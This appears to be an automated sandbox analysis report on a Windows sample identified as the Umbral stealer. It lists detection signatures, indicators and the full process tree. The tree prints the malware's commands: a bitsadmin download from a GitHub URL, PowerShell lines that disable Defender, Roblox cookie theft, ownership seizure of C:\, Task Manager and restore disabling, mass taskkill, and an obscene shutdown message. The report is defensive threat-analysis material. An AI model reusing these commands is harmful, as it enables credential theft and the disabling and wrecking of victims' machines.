umbral | 0996384cead0e1be85b7c15efc3db74bed7cef7513766d0ec8bf5026274ea6a5

Analysis

max time kernel
97s
max time network
117s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
09-08-2024 10:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

test.exe
Size

97KB
MD5

76e3b500026a13b38f9f898f54db8d38
SHA1

25a2c9fac994627ad49067f132ee0d320025f23b
SHA256

0996384cead0e1be85b7c15efc3db74bed7cef7513766d0ec8bf5026274ea6a5
SHA512

15e974221e1da794fae0abc4f3e4c1c67631b3bc0b4a95df4bb31912de5831d9470b90217e90d347ceab8a5a0623663fe99d9be27155598408f009a3b5fd4f93
SSDEEP

1536:r7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIf/wTA+J/pOg:n7DhdC6kzWypvaQ0FxyNTBf/Q

Score

10^/10

umbral credential_access discovery dropper execution exploit ransomware stealer

Malware Config

Signatures

Detect Umbral payload 1 IoCs

resource	yara_rule
behavioral1/memory/4088-2-0x000001BBB9BB0000-0x000001BBB9BF0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 5 IoCs

flow	pid	Process
36	3720	WScript.exe
41	3720	WScript.exe
72	4492	WScript.exe
73	4492	WScript.exe
75	4492	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4716	powershell.exe
4736	powershell.exe
3488	powershell.exe
3668	powershell.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
2392	bitsadmin.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
1816	takeown.exe
5040	icacls.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	cmd.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
3224	melter.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1816	takeown.exe
5040	icacls.exe

Enumerates connected drives 3 TTPs 47 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Z:	WScript.exe
File opened (read-only)	\??\M:	WScript.exe
File opened (read-only)	\??\K:	WScript.exe
File opened (read-only)	\??\N:	WScript.exe
File opened (read-only)	\??\W:	WScript.exe
File opened (read-only)	\??\N:	WScript.exe
File opened (read-only)	\??\R:	WScript.exe
File opened (read-only)	\??\T:	WScript.exe
File opened (read-only)	\??\B:	WScript.exe
File opened (read-only)	\??\H:	WScript.exe
File opened (read-only)	\??\O:	WScript.exe
File opened (read-only)	\??\M:	WScript.exe
File opened (read-only)	\??\P:	WScript.exe
File opened (read-only)	\??\Q:	WScript.exe
File opened (read-only)	\??\J:	WScript.exe
File opened (read-only)	\??\O:	WScript.exe
File opened (read-only)	\??\U:	WScript.exe
File opened (read-only)	\??\X:	WScript.exe
File opened (read-only)	\??\J:	WScript.exe
File opened (read-only)	\??\T:	WScript.exe
File opened (read-only)	\??\X:	WScript.exe
File opened (read-only)	\??\P:	WScript.exe
File opened (read-only)	\??\G:	WScript.exe
File opened (read-only)	\??\R:	WScript.exe
File opened (read-only)	\??\Y:	WScript.exe
File opened (read-only)	\??\A:	WScript.exe
File opened (read-only)	\??\B:	WScript.exe
File opened (read-only)	\??\G:	WScript.exe
File opened (read-only)	\??\I:	WScript.exe
File opened (read-only)	\??\K:	WScript.exe
File opened (read-only)	\??\A:	WScript.exe
File opened (read-only)	\??\Q:	WScript.exe
File opened (read-only)	\??\S:	WScript.exe
File opened (read-only)	\??\Z:	WScript.exe
File opened (read-only)	\??\D:	WScript.exe
File opened (read-only)	\??\L:	WScript.exe
File opened (read-only)	\??\L:	WScript.exe
File opened (read-only)	\??\U:	WScript.exe
File opened (read-only)	\??\V:	WScript.exe
File opened (read-only)	\??\E:	WScript.exe
File opened (read-only)	\??\V:	WScript.exe
File opened (read-only)	\??\W:	WScript.exe
File opened (read-only)	\??\H:	WScript.exe
File opened (read-only)	\??\I:	WScript.exe
File opened (read-only)	\??\S:	WScript.exe
File opened (read-only)	\??\Y:	WScript.exe
File opened (read-only)	\??\E:	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
29	raw.githubusercontent.com
30	raw.githubusercontent.com
46	discord.com
47	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
37	ip-api.com

Sets desktop wallpaper using registry 2 TTPs 18 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg"	reg.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa	cmd.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\server\classes.jsa	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	test.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	melter.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2248	cmd.exe
2256	PING.EXE

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
4520	timeout.exe
800	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1980	wmic.exe

Kills process with taskkill 11 IoCs

evasion

pid	Process
3220	taskkill.exe
3064	taskkill.exe
1924	taskkill.exe
1156	taskkill.exe
2440	taskkill.exe
4360	taskkill.exe
3768	taskkill.exe
1952	taskkill.exe
3004	taskkill.exe
1764	taskkill.exe
1576	taskkill.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	cmd.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2256	PING.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	36	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	41	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
4088	Umbral.exe
4088	Umbral.exe
4716	powershell.exe
4716	powershell.exe
4716	powershell.exe
4736	powershell.exe
4736	powershell.exe
4736	powershell.exe
3488	powershell.exe
3488	powershell.exe
3488	powershell.exe
956	powershell.exe
956	powershell.exe
956	powershell.exe
3668	powershell.exe
3668	powershell.exe
3668	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	1816	takeown.exe
Token: SeTakeOwnershipPrivilege	1816	takeown.exe
Token: SeDebugPrivilege	4088	Umbral.exe
Token: SeIncreaseQuotaPrivilege	4300	wmic.exe
Token: SeSecurityPrivilege	4300	wmic.exe
Token: SeTakeOwnershipPrivilege	4300	wmic.exe
Token: SeLoadDriverPrivilege	4300	wmic.exe
Token: SeSystemProfilePrivilege	4300	wmic.exe
Token: SeSystemtimePrivilege	4300	wmic.exe
Token: SeProfSingleProcessPrivilege	4300	wmic.exe
Token: SeIncBasePriorityPrivilege	4300	wmic.exe
Token: SeCreatePagefilePrivilege	4300	wmic.exe
Token: SeBackupPrivilege	4300	wmic.exe
Token: SeRestorePrivilege	4300	wmic.exe
Token: SeShutdownPrivilege	4300	wmic.exe
Token: SeDebugPrivilege	4300	wmic.exe
Token: SeSystemEnvironmentPrivilege	4300	wmic.exe
Token: SeRemoteShutdownPrivilege	4300	wmic.exe
Token: SeUndockPrivilege	4300	wmic.exe
Token: SeManageVolumePrivilege	4300	wmic.exe
Token: 33	4300	wmic.exe
Token: 34	4300	wmic.exe
Token: 35	4300	wmic.exe
Token: 36	4300	wmic.exe
Token: SeIncreaseQuotaPrivilege	4300	wmic.exe
Token: SeSecurityPrivilege	4300	wmic.exe
Token: SeTakeOwnershipPrivilege	4300	wmic.exe
Token: SeLoadDriverPrivilege	4300	wmic.exe
Token: SeSystemProfilePrivilege	4300	wmic.exe
Token: SeSystemtimePrivilege	4300	wmic.exe
Token: SeProfSingleProcessPrivilege	4300	wmic.exe
Token: SeIncBasePriorityPrivilege	4300	wmic.exe
Token: SeCreatePagefilePrivilege	4300	wmic.exe
Token: SeBackupPrivilege	4300	wmic.exe
Token: SeRestorePrivilege	4300	wmic.exe
Token: SeShutdownPrivilege	4300	wmic.exe
Token: SeDebugPrivilege	4300	wmic.exe
Token: SeSystemEnvironmentPrivilege	4300	wmic.exe
Token: SeRemoteShutdownPrivilege	4300	wmic.exe
Token: SeUndockPrivilege	4300	wmic.exe
Token: SeManageVolumePrivilege	4300	wmic.exe
Token: 33	4300	wmic.exe
Token: 34	4300	wmic.exe
Token: 35	4300	wmic.exe
Token: 36	4300	wmic.exe
Token: SeDebugPrivilege	4716	powershell.exe
Token: SeDebugPrivilege	4736	powershell.exe
Token: SeDebugPrivilege	3488	powershell.exe
Token: SeDebugPrivilege	956	powershell.exe
Token: SeIncreaseQuotaPrivilege	2336	wmic.exe
Token: SeSecurityPrivilege	2336	wmic.exe
Token: SeTakeOwnershipPrivilege	2336	wmic.exe
Token: SeLoadDriverPrivilege	2336	wmic.exe
Token: SeSystemProfilePrivilege	2336	wmic.exe
Token: SeSystemtimePrivilege	2336	wmic.exe
Token: SeProfSingleProcessPrivilege	2336	wmic.exe
Token: SeIncBasePriorityPrivilege	2336	wmic.exe
Token: SeCreatePagefilePrivilege	2336	wmic.exe
Token: SeBackupPrivilege	2336	wmic.exe
Token: SeRestorePrivilege	2336	wmic.exe
Token: SeShutdownPrivilege	2336	wmic.exe
Token: SeDebugPrivilege	2336	wmic.exe
Token: SeSystemEnvironmentPrivilege	2336	wmic.exe
Token: SeRemoteShutdownPrivilege	2336	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 892 wrote to memory of 2996	892	test.exe	91
PID 892 wrote to memory of 2996	892	test.exe	91
PID 2996 wrote to memory of 2392	2996	cmd.exe	92
PID 2996 wrote to memory of 2392	2996	cmd.exe	92
PID 2996 wrote to memory of 4088	2996	cmd.exe	99
PID 2996 wrote to memory of 4088	2996	cmd.exe	99
PID 2996 wrote to memory of 1816	2996	cmd.exe	100
PID 2996 wrote to memory of 1816	2996	cmd.exe	100
PID 2996 wrote to memory of 5040	2996	cmd.exe	101
PID 2996 wrote to memory of 5040	2996	cmd.exe	101
PID 2996 wrote to memory of 2500	2996	cmd.exe	102
PID 2996 wrote to memory of 2500	2996	cmd.exe	102
PID 2996 wrote to memory of 3728	2996	cmd.exe	103
PID 2996 wrote to memory of 3728	2996	cmd.exe	103
PID 4088 wrote to memory of 4300	4088	Umbral.exe	104
PID 4088 wrote to memory of 4300	4088	Umbral.exe	104
PID 2996 wrote to memory of 1848	2996	cmd.exe	106
PID 2996 wrote to memory of 1848	2996	cmd.exe	106
PID 2996 wrote to memory of 3720	2996	cmd.exe	107
PID 2996 wrote to memory of 3720	2996	cmd.exe	107
PID 2996 wrote to memory of 4520	2996	cmd.exe	108
PID 2996 wrote to memory of 4520	2996	cmd.exe	108
PID 4088 wrote to memory of 2424	4088	Umbral.exe	110
PID 4088 wrote to memory of 2424	4088	Umbral.exe	110
PID 4088 wrote to memory of 4716	4088	Umbral.exe	112
PID 4088 wrote to memory of 4716	4088	Umbral.exe	112
PID 4088 wrote to memory of 4736	4088	Umbral.exe	114
PID 4088 wrote to memory of 4736	4088	Umbral.exe	114
PID 4088 wrote to memory of 3488	4088	Umbral.exe	116
PID 4088 wrote to memory of 3488	4088	Umbral.exe	116
PID 4088 wrote to memory of 956	4088	Umbral.exe	118
PID 4088 wrote to memory of 956	4088	Umbral.exe	118
PID 4088 wrote to memory of 2336	4088	Umbral.exe	120
PID 4088 wrote to memory of 2336	4088	Umbral.exe	120
PID 4088 wrote to memory of 4548	4088	Umbral.exe	122
PID 4088 wrote to memory of 4548	4088	Umbral.exe	122
PID 4088 wrote to memory of 4860	4088	Umbral.exe	124
PID 4088 wrote to memory of 4860	4088	Umbral.exe	124
PID 4088 wrote to memory of 3668	4088	Umbral.exe	126
PID 4088 wrote to memory of 3668	4088	Umbral.exe	126
PID 4088 wrote to memory of 1980	4088	Umbral.exe	128
PID 4088 wrote to memory of 1980	4088	Umbral.exe	128
PID 4088 wrote to memory of 2248	4088	Umbral.exe	130
PID 4088 wrote to memory of 2248	4088	Umbral.exe	130
PID 2248 wrote to memory of 2256	2248	cmd.exe	132
PID 2248 wrote to memory of 2256	2248	cmd.exe	132
PID 2996 wrote to memory of 4852	2996	cmd.exe	135
PID 2996 wrote to memory of 4852	2996	cmd.exe	135
PID 2996 wrote to memory of 2208	2996	cmd.exe	136
PID 2996 wrote to memory of 2208	2996	cmd.exe	136
PID 2996 wrote to memory of 800	2996	cmd.exe	137
PID 2996 wrote to memory of 800	2996	cmd.exe	137
PID 2996 wrote to memory of 1952	2996	cmd.exe	139
PID 2996 wrote to memory of 1952	2996	cmd.exe	139
PID 2996 wrote to memory of 3220	2996	cmd.exe	140
PID 2996 wrote to memory of 3220	2996	cmd.exe	140
PID 2996 wrote to memory of 3004	2996	cmd.exe	141
PID 2996 wrote to memory of 3004	2996	cmd.exe	141
PID 2996 wrote to memory of 1764	2996	cmd.exe	142
PID 2996 wrote to memory of 1764	2996	cmd.exe	142
PID 2996 wrote to memory of 3064	2996	cmd.exe	165
PID 2996 wrote to memory of 3064	2996	cmd.exe	165
PID 2996 wrote to memory of 1924	2996	cmd.exe	144
PID 2996 wrote to memory of 1924	2996	cmd.exe	144

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2424	attrib.exe

C:\Users\Admin\AppData\Local\Temp\test.exe
"C:\Users\Admin\AppData\Local\Temp\test.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:892
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\66C4.tmp\66C5.tmp\66C6.bat C:\Users\Admin\AppData\Local\Temp\test.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Drops file in Program Files directory
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2996
- - C:\Windows\system32\bitsadmin.exe
    bitsadmin /transfer downloadjob /download /priority normal https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    3⤵
    - Download via BitsAdmin
    PID:2392
- - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Drops file in Drivers directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4088
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4300
  - - C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      4⤵
      Views/modifies file attributes
      PID:2424
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4716
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4736
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3488
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:956
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2336
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      PID:4548
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:4860
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3668
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1980
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Suspicious use of WriteProcessMemory
      PID:2248
    - - C:\Windows\system32\PING.EXE
        
        ping localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2256
- - C:\Windows\system32\takeown.exe
    takeown /f C:\*.*
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1816
- - C:\Windows\system32\icacls.exe
    Icacls C:\*.* /C /G Admin:F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:5040
- - C:\Windows\system32\reg.exe
    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:2500
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    3⤵
    PID:3728
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\32120.vbs"
    3⤵
    PID:1848
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1230.vbs"
    3⤵
    - Blocklisted process makes network request
    PID:3720
- - C:\Windows\system32\timeout.exe
    timeout 60
    3⤵
    - Delays execution with timeout.exe
    PID:4520
- - C:\Windows\system32\rundll32.exe
    rundll32 user32.dll, SwapMouseButton
    3⤵
    PID:4852
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\19765.vbs"
    3⤵
    PID:2208
- - C:\Windows\system32\timeout.exe
    timeout 14
    3⤵
    - Delays execution with timeout.exe
    PID:800
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM hl2.exe
    3⤵
    - Kills process with taskkill
    PID:1952
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM javaw.exe
    3⤵
    - Kills process with taskkill
    PID:3220
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM RobloxPlayerBeta.exe
    3⤵
    - Kills process with taskkill
    PID:3004
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:1764
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM GenshinImpact.exe
    3⤵
    - Kills process with taskkill
    PID:3064
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM Among Us.exe
    3⤵
    - Kills process with taskkill
    PID:1924
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM chrome.exe
    3⤵
    - Kills process with taskkill
    PID:1576
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM firefox.exe
    3⤵
    - Kills process with taskkill
    PID:1156
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM msedge.exe
    3⤵
    - Kills process with taskkill
    PID:2440
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM iexplore.exe
    3⤵
    - Kills process with taskkill
    PID:4360
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM explorer.exe
    3⤵
    - Kills process with taskkill
    PID:3768
- - C:\Windows\system32\shutdown.exe
    shutdown -r -t 60 -c "Dans 1 minutes tu n'as plus de PC fils de viol, On t'a bien baiser le cul fils de pute :)"
    3⤵
    PID:4808
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2297.vbs"
    3⤵
    - Blocklisted process makes network request
    - Enumerates connected drives
    PID:4492
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26761.vbs"
    3⤵
    - Enumerates connected drives
    PID:3096
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20056.vbs"
    3⤵
    PID:4564
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\risitas.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3848
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6180.vbs" 17222.bat
    3⤵
    - Checks computer location settings
    PID:560
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\17222.bat" "
      4⤵
      Checks computer location settings
      Modifies registry class
      PID:3064
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:1632
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4264
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:2264
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:2720
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:4800
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
        5⤵
        
        PID:212
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:2272
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4884
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
        5⤵
        
        PID:3360
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
        5⤵
        
        PID:4464
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:1920
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\15233.vbs"
